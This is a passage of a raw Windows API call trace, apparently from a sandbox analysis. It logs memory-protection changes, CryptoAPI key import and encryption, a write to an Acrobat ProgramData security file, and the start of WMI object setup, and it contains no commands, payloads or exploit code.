BaseAddress=0x6e4e180*=0x777117b8, NumberOfBytesToProtect=0x6e4e184, NewAccessProtection=0x4, OldAccessProtection=0x6e4e1b8 | out: BaseAddress=0x6e4e180*=0x77711000, NumberOfBytesToProtect=0x6e4e184, OldAccessProtection=0x6e4e1b8*=0x4) returned 0x0 [0139.287] GetCurrentProcess () returned 0xffffffff [0139.287] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6e4e180*=0x777117bc, NumberOfBytesToProtect=0x6e4e184, NewAccessProtection=0x4, OldAccessProtection=0x6e4e1b8 | out: BaseAddress=0x6e4e180*=0x77711000, NumberOfBytesToProtect=0x6e4e184, OldAccessProtection=0x6e4e1b8*=0x4) returned 0x0 [0139.288] GetCurrentProcess () returned 0xffffffff [0139.288] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6e4e180*=0x777117bc, NumberOfBytesToProtect=0x6e4e184, NewAccessProtection=0x4, OldAccessProtection=0x6e4e1b8 | out: BaseAddress=0x6e4e180*=0x77711000, NumberOfBytesToProtect=0x6e4e184, OldAccessProtection=0x6e4e1b8*=0x4) returned 0x0 [0139.288] GetCurrentProcess () returned 0xffffffff [0139.288] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6e4e180*=0x777117c8, NumberOfBytesToProtect=0x6e4e184, NewAccessProtection=0x4, OldAccessProtection=0x6e4e1b8 | out: BaseAddress=0x6e4e180*=0x77711000, NumberOfBytesToProtect=0x6e4e184, OldAccessProtection=0x6e4e1b8*=0x4) returned 0x0 [0139.289] GetCurrentProcess () returned 0xffffffff [0139.289] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6e4e180*=0x777117c8, NumberOfBytesToProtect=0x6e4e184, NewAccessProtection=0x4, OldAccessProtection=0x6e4e1b8 | out: BaseAddress=0x6e4e180*=0x77711000, NumberOfBytesToProtect=0x6e4e184, OldAccessProtection=0x6e4e1b8*=0x4) returned 0x0 [0139.290] GetCurrentProcess () returned 0xffffffff [0139.290] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6e4e180*=0x777117d0, NumberOfBytesToProtect=0x6e4e184, NewAccessProtection=0x4, OldAccessProtection=0x6e4e1b8 | out: BaseAddress=0x6e4e180*=0x77711000, NumberOfBytesToProtect=0x6e4e184, OldAccessProtection=0x6e4e1b8*=0x4) returned 0x0 [0139.290] GetCurrentProcess () returned 0xffffffff [0139.290] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6e4e180*=0x777117d0, NumberOfBytesToProtect=0x6e4e184, NewAccessProtection=0x4, OldAccessProtection=0x6e4e1b8 | out: BaseAddress=0x6e4e180*=0x77711000, NumberOfBytesToProtect=0x6e4e184, OldAccessProtection=0x6e4e1b8*=0x4) returned 0x0 [0139.291] GetCurrentProcess () returned 0xffffffff [0139.291] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6e4e180*=0x7771180c, NumberOfBytesToProtect=0x6e4e184, NewAccessProtection=0x4, OldAccessProtection=0x6e4e1b8 | out: BaseAddress=0x6e4e180*=0x77711000, NumberOfBytesToProtect=0x6e4e184, OldAccessProtection=0x6e4e1b8*=0x4) returned 0x0 [0139.291] GetCurrentProcess () returned 0xffffffff [0139.291] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6e4e180*=0x7771180c, NumberOfBytesToProtect=0x6e4e184, NewAccessProtection=0x4, OldAccessProtection=0x6e4e1b8 | out: BaseAddress=0x6e4e180*=0x77711000, NumberOfBytesToProtect=0x6e4e184, OldAccessProtection=0x6e4e1b8*=0x4) returned 0x0 [0139.292] GetCurrentProcess () returned 0xffffffff [0139.292] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6e4e180*=0x7771182c, NumberOfBytesToProtect=0x6e4e184, NewAccessProtection=0x4, OldAccessProtection=0x6e4e1b8 | out: BaseAddress=0x6e4e180*=0x77711000, NumberOfBytesToProtect=0x6e4e184, OldAccessProtection=0x6e4e1b8*=0x4) returned 0x0 [0139.292] GetCurrentProcess () returned 0xffffffff [0139.292] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6e4e180*=0x7771182c, NumberOfBytesToProtect=0x6e4e184, NewAccessProtection=0x4, OldAccessProtection=0x6e4e1b8 | out: BaseAddress=0x6e4e180*=0x77711000, NumberOfBytesToProtect=0x6e4e184, OldAccessProtection=0x6e4e1b8*=0x4) returned 0x0 [0139.293] GetCurrentProcess () returned 0xffffffff [0139.293] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6e4e180*=0x77711860, NumberOfBytesToProtect=0x6e4e184, NewAccessProtection=0x4, OldAccessProtection=0x6e4e1b8 | out: BaseAddress=0x6e4e180*=0x77711000, NumberOfBytesToProtect=0x6e4e184, OldAccessProtection=0x6e4e1b8*=0x4) returned 0x0 [0139.293] GetCurrentProcess () returned 0xffffffff [0139.293] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6e4e180*=0x77711860, NumberOfBytesToProtect=0x6e4e184, NewAccessProtection=0x4, OldAccessProtection=0x6e4e1b8 | out: BaseAddress=0x6e4e180*=0x77711000, NumberOfBytesToProtect=0x6e4e184, OldAccessProtection=0x6e4e1b8*=0x4) returned 0x0 [0139.294] SetLastError (dwErrCode=0x0) [0139.294] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContext") returned 0x0 [0139.295] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0139.296] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0139.296] CryptAcquireContextW (in: phProv=0x6e4eddc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6e4eddc*=0x6ee300) returned 1 [0139.368] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetProvParam") returned 0x77753218 [0139.368] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x0, pdwDataLen=0x6e4eda0, dwFlags=0x1 | out: pbData=0x0, pdwDataLen=0x6e4eda0) returned 1 [0139.368] GetProcAddress (hModule=0x75240000, lpProcName="CryptGetProvParam") returned 0x75245d6a [0139.370] CoTaskMemAlloc (cb=0x20) returned 0x7ad3d0 [0139.370] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x7ad3d0, pdwDataLen=0x6e4eda0, dwFlags=0x1 | out: pbData=0x7ad3d0, pdwDataLen=0x6e4eda0) returned 1 [0139.372] CoTaskMemFree (pv=0x7ad3d0) [0139.372] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6e4eda0) returned 1 [0139.372] CoTaskMemAlloc (cb=0x20) returned 0x7ad3d0 [0139.372] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x7ad3d0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x7ad3d0, pdwDataLen=0x6e4eda0) returned 1 [0139.372] CoTaskMemFree (pv=0x7ad3d0) [0139.372] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6e4eda0) returned 1 [0139.373] CoTaskMemAlloc (cb=0x20) returned 0x7ad3d0 [0139.373] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x7ad3d0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x7ad3d0, pdwDataLen=0x6e4eda0) returned 1 [0139.373] CoTaskMemFree (pv=0x7ad3d0) [0139.373] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6e4eda0) returned 1 [0139.373] CoTaskMemAlloc (cb=0x20) returned 0x7ad3d0 [0139.373] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x7ad3d0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x7ad3d0, pdwDataLen=0x6e4eda0) returned 1 [0139.373] CoTaskMemFree (pv=0x7ad3d0) [0139.373] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6e4eda0) returned 1 [0139.373] CoTaskMemAlloc (cb=0x20) returned 0x7ad3d0 [0139.373] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x7ad3d0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x7ad3d0, pdwDataLen=0x6e4eda0) returned 1 [0139.373] CoTaskMemFree (pv=0x7ad3d0) [0139.373] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6e4eda0) returned 1 [0139.373] CoTaskMemAlloc (cb=0x20) returned 0x7ad3d0 [0139.373] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x7ad3d0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x7ad3d0, pdwDataLen=0x6e4eda0) returned 1 [0139.373] CoTaskMemFree (pv=0x7ad3d0) [0139.373] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6e4eda0) returned 1 [0139.373] CoTaskMemAlloc (cb=0x20) returned 0x7ad3d0 [0139.373] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x7ad3d0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x7ad3d0, pdwDataLen=0x6e4eda0) returned 1 [0139.374] CoTaskMemFree (pv=0x7ad3d0) [0139.374] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6e4eda0) returned 1 [0139.374] CoTaskMemAlloc (cb=0x20) returned 0x7ad3d0 [0139.374] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x7ad3d0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x7ad3d0, pdwDataLen=0x6e4eda0) returned 1 [0139.374] CoTaskMemFree (pv=0x7ad3d0) [0139.374] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6e4eda0) returned 1 [0139.374] CoTaskMemAlloc (cb=0x20) returned 0x7ad3d0 [0139.374] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x7ad3d0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x7ad3d0, pdwDataLen=0x6e4eda0) returned 1 [0139.374] CoTaskMemFree (pv=0x7ad3d0) [0139.374] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6e4eda0) returned 1 [0139.374] CoTaskMemAlloc (cb=0x20) returned 0x7ad3d0 [0139.374] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x7ad3d0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x7ad3d0, pdwDataLen=0x6e4eda0) returned 1 [0139.374] CoTaskMemFree (pv=0x7ad3d0) [0139.374] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6e4eda0) returned 1 [0139.374] CoTaskMemAlloc (cb=0x20) returned 0x7ad3d0 [0139.374] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x7ad3d0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x7ad3d0, pdwDataLen=0x6e4eda0) returned 1 [0139.374] CoTaskMemFree (pv=0x7ad3d0) [0139.374] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6e4eda0) returned 1 [0139.375] CoTaskMemAlloc (cb=0x20) returned 0x7ad3d0 [0139.375] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x7ad3d0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x7ad3d0, pdwDataLen=0x6e4eda0) returned 1 [0139.375] CoTaskMemFree (pv=0x7ad3d0) [0139.375] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6e4eda0) returned 1 [0139.375] CoTaskMemAlloc (cb=0x20) returned 0x7ad3d0 [0139.375] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x7ad3d0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x7ad3d0, pdwDataLen=0x6e4eda0) returned 1 [0139.375] CoTaskMemFree (pv=0x7ad3d0) [0139.375] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6e4eda0) returned 1 [0139.375] CoTaskMemAlloc (cb=0x20) returned 0x7ad3d0 [0139.375] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x7ad3d0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x7ad3d0, pdwDataLen=0x6e4eda0) returned 1 [0139.375] CoTaskMemFree (pv=0x7ad3d0) [0139.375] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6e4eda0) returned 1 [0139.375] CoTaskMemAlloc (cb=0x20) returned 0x7ad3d0 [0139.375] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x7ad3d0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x7ad3d0, pdwDataLen=0x6e4eda0) returned 1 [0139.375] CoTaskMemFree (pv=0x7ad3d0) [0139.375] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6e4eda0) returned 1 [0139.375] CoTaskMemAlloc (cb=0x20) returned 0x7ad3d0 [0139.375] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x7ad3d0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x7ad3d0, pdwDataLen=0x6e4eda0) returned 1 [0139.376] CoTaskMemFree (pv=0x7ad3d0) [0139.376] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6e4eda0) returned 1 [0139.376] CoTaskMemAlloc (cb=0x20) returned 0x7ad3d0 [0139.376] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x7ad3d0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x7ad3d0, pdwDataLen=0x6e4eda0) returned 1 [0139.376] CoTaskMemFree (pv=0x7ad3d0) [0139.376] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6e4eda0) returned 1 [0139.376] CoTaskMemAlloc (cb=0x20) returned 0x7ad3d0 [0139.376] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x7ad3d0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x7ad3d0, pdwDataLen=0x6e4eda0) returned 1 [0139.376] CoTaskMemFree (pv=0x7ad3d0) [0139.376] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6e4eda0) returned 1 [0139.376] CoTaskMemAlloc (cb=0x20) returned 0x7ad3d0 [0139.376] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x7ad3d0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x7ad3d0, pdwDataLen=0x6e4eda0) returned 1 [0139.376] CoTaskMemFree (pv=0x7ad3d0) [0139.376] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6e4eda0) returned 1 [0139.376] CoTaskMemAlloc (cb=0x20) returned 0x7ad3d0 [0139.377] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x7ad3d0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x7ad3d0, pdwDataLen=0x6e4eda0) returned 1 [0139.377] CoTaskMemFree (pv=0x7ad3d0) [0139.377] CryptGetProvParam (in: hProv=0x6ee300, dwParam=0x1, pbData=0x0, pdwDataLen=0x6e4eda0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6e4eda0) returned 0 [0139.746] GetProcAddress (hModule=0x77710000, lpProcName="CryptGenRandom") returned 0x7771dfc8 [0139.746] CryptGenRandom (in: hProv=0x6ee300, dwLen=0x10, pbBuffer=0x33e1ba8 | out: pbBuffer=0x33e1ba8) returned 1 [0139.748] GetProcAddress (hModule=0x75240000, lpProcName="CryptCreateHash") returned 0x7524556b [0139.749] GetProcAddress (hModule=0x75240000, lpProcName="CryptHashData") returned 0x752457b2 [0139.750] GetProcAddress (hModule=0x75240000, lpProcName="CryptGetHashParam") returned 0x75245ecc [0139.751] GetProcAddress (hModule=0x75240000, lpProcName="CryptDestroyHash") returned 0x75245985 [0142.509] GetProcAddress (hModule=0x77710000, lpProcName="CryptContextAddRef") returned 0x77753168 [0142.510] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0142.511] GetProcAddress (hModule=0x77710000, lpProcName="CryptImportKey") returned 0x7771c532 [0142.511] CryptImportKey (in: hProv=0x6ee300, pbData=0x364de24, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6e4edac | out: phKey=0x6e4edac*=0x77b030) returned 1 [0142.512] CryptContextAddRef (hProv=0x6ee300, pdwReserved=0x0, dwFlags=0x0) returned 1 [0142.512] GetProcAddress (hModule=0x75240000, lpProcName="CryptContextAddRef") returned 0x75242e79 [0142.514] GetProcAddress (hModule=0x77710000, lpProcName="CryptContextAddRef") returned 0x77753168 [0142.514] CryptContextAddRef (hProv=0x6ee300, pdwReserved=0x0, dwFlags=0x0) returned 1 [0142.515] GetProcAddress (hModule=0x77710000, lpProcName="CryptDuplicateKey") returned 0x777531a8 [0142.515] CryptDuplicateKey (in: hKey=0x77b030, pdwReserved=0x0, dwFlags=0x0, phKey=0x6e4ed9c | out: phKey=0x6e4ed9c*=0x77b070) returned 1 [0142.515] GetProcAddress (hModule=0x75240000, lpProcName="CryptDuplicateKey") returned 0x75244a67 [0142.515] CryptContextAddRef (hProv=0x6ee300, pdwReserved=0x0, dwFlags=0x0) returned 1 [0142.516] GetProcAddress (hModule=0x77710000, lpProcName="CryptSetKeyParam") returned 0x777377b3 [0142.516] CryptSetKeyParam (hKey=0x77b070, dwParam=0x4, pbData=0x364df04*=0x1, dwFlags=0x0) returned 1 [0142.516] GetProcAddress (hModule=0x75240000, lpProcName="CryptSetKeyParam") returned 0x75244df2 [0142.517] CryptSetKeyParam (hKey=0x77b070, dwParam=0x1, pbData=0x364ded0, dwFlags=0x0) returned 1 [0142.518] GetProcAddress (hModule=0x77710000, lpProcName="CryptEncrypt") returned 0x7773779b [0142.518] CryptEncrypt (in: hKey=0x77b070, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x364df14*, pdwDataLen=0x6e4ee08*=0x1e0, dwBufLen=0x1e0 | out: pbData=0x364df14*, pdwDataLen=0x6e4ee08*=0x1e0) returned 1 [0142.519] CryptEncrypt (in: hKey=0x77b070, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x364e118*, pdwDataLen=0x6e4ee10*=0x0, dwBufLen=0x10 | out: pbData=0x364e118*, pdwDataLen=0x6e4ee10*=0x10) returned 1 [0146.776] GetProcAddress (hModule=0x77710000, lpProcName="CryptDestroyKey") returned 0x7771c51a [0146.776] CryptDestroyKey (hKey=0x77b030) returned 1 [0146.777] CryptReleaseContext (hProv=0x6ee300, dwFlags=0x0) returned 1 [0146.777] CryptReleaseContext (hProv=0x6ee300, dwFlags=0x0) returned 1 [0146.777] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata", nBufferLength=0x105, lpBuffer=0x6e4e880, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata", lpFilePart=0x0) returned 0x49 [0146.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4ed74) returned 1 [0146.777] CreateFileW (lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3a8 [0146.778] GetFileType (hFile=0x3a8) returned 0x1 [0146.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4ed70) returned 1 [0146.778] GetFileType (hFile=0x3a8) returned 0x1 [0146.778] WriteFile (in: hFile=0x3a8, lpBuffer=0x3515d24*, nNumberOfBytesToWrite=0x3f0, lpNumberOfBytesWritten=0x6e4ee04, lpOverlapped=0x0 | out: lpBuffer=0x3515d24*, lpNumberOfBytesWritten=0x6e4ee04*=0x3f0, lpOverlapped=0x0) returned 1 [0146.779] CloseHandle (hObject=0x3a8) returned 1 [0146.781] CoTaskMemAlloc (cb=0x20c) returned 0x771fc0 [0146.781] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x771fc0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0146.781] CoTaskMemFree (pv=0x771fc0) [0146.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6e4e868, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0146.781] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6e4edb0 | out: ppv=0x6e4edb0*=0x72015c) returned 0x0 [0146.781] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6e4eda8 | out: pAptType=0x6e4eda8*=1) returned 0x0 [0146.781] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6e4edac | out: ppvObject=0x6e4edac*=0x0) returned 0x80004002 [0146.781] IUnknown:Release (This=0x72015c) returned 0x1 [0146.783] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6e4e718 | out: ppv=0x6e4e718*=0x6736ee8) returned 0x0 [0146.783] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736ee8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6e4e930 | out: ppvObject=0x6e4e930*=0x0) returned 0x80004002 [0146.783] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736ee8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e944 | out: ppvObject=0x6e4e944*=0x67385b0) returned 0x0 [0146.783] WbemDefPath:IUnknown:Release (This=0x6736ee8) returned 0x0 [0146.783] WbemDefPath:IUnknown:QueryInterface (in: This=0x67385b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e564 | out: ppvObject=0x6e4e564*=0x67385b0) returned 0x0 [0146.783] WbemDefPath:IUnknown:QueryInterface (in: This=0x67385b0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6e4e520 | out: ppvObject=0x6e4e520*=0x0) returned 0x80004002 [0146.783] WbemDefPath:IUnknown:AddRef (This=0x67385b0) returned 0x3 [0146.784] WbemDefPath:IUnknown:QueryInterface (in: This=0x67385b0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6e4de7c | out: ppvObject=0x6e4de7c*=0x0) returned 0x80004002 [0146.784] WbemDefPath:IUnknown:QueryInterface (in: This=0x67385b0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6e4de2c | out: ppvObject=0x6e4de2c*=0x0) returned 0x80004002 [0146.784] WbemDefPath:IUnknown:QueryInterface (in: This=0x67385b0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4de38 | out: ppvObject=0x6e4de38*=0x77dcd8) returned 0x0 [0146.784] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77dcd8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6e4de40 | out: pCid=0x6e4de40*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0146.784] WbemDefPath:IUnknown:Release (This=0x77dcd8) returned 0x3 [0146.784] CoGetContextToken (in: pToken=0x6e4de98 | out: pToken=0x6e4de98) returned 0x0 [0146.785] CoGetContextToken (in: pToken=0x6e4e2a0 | out: pToken=0x6e4e2a0) returned 0x0 [0146.785] WbemDefPath:IUnknown:QueryInterface (in: This=0x67385b0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e330 | out: ppvObject=0x6e4e330*=0x0) returned 0x80004002 [0146.785] WbemDefPath:IUnknown:Release (This=0x67385b0) returned 0x2 [0146.785] WbemDefPath:IUnknown:Release (This=0x67385b0) returned 0x1 [0146.785] CoGetContextToken (in: pToken=0x6e4ec28 | out: pToken=0x6e4ec28) returned 0x0 [0146.785] CoGetContextToken (in: pToken=0x6e4eb88 | out: pToken=0x6e4eb88) returned 0x0 [0146.785] WbemDefPath:IUnknown:QueryInterface (in: This=0x67385b0, riid=0x6e4ec58*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6e4ec54 | out: ppvObject=0x6e4ec54*=0x67385b0) returned 